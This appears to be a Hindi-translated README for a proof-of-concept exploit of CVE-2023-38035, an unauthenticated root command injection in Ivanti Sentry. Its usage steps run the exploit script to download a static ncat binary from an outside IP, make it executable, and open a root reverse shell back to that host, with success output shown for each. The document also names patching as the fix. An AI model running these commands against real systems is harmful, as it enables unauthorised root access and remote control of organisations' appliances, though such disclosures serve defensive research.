
CVE-2023-38035 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Ivanti Sentry में एक अप्रमाणित कमांड इंजेक्शन जो ncat के माध्यम से मनमाना रूट कमांड निष्पादन और रिवर्स शेल सक्षम बनाता है।
Ivanti Sentry को प्रभावित करने वाला POC for CVE-2023-38035
इस कमजोरी का तकनीकी मूल कारण विश्लेषण हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive
यह POC एक अप्रमाणित कमांड इंजेक्शन का दुरुपयोग करके रूट उपयोगकर्ता के रूप में मनमाने कमांड निष्पादित करता है।
निष्पादन संदर्भ कमांड पाइपिंग की अनुमति नहीं देता है, और सिस्टम आसानी से दुरुपयोग करने योग्य बाइनरी के साथ नहीं आता है, इसलिए कमांड को श्रृंखलित किया जा सकता है ताकि https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat जैसी जगह से एक स्थिर ncat डाउनलोड किया जा सके।
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
[+] Successfully executed command on target!

Ivanti सलाहकार के निर्देशों के अनुसार नवीनतम संस्करण में अपडेट करें
यह सॉफ्टवेयर विशुद्ध रूप से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग सिस्टम पर हमला करने के लिए नहीं किया जाना है, सिवाय उन मामलों के जहां स्पष्ट रूप से अधिकृत किया गया हो। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।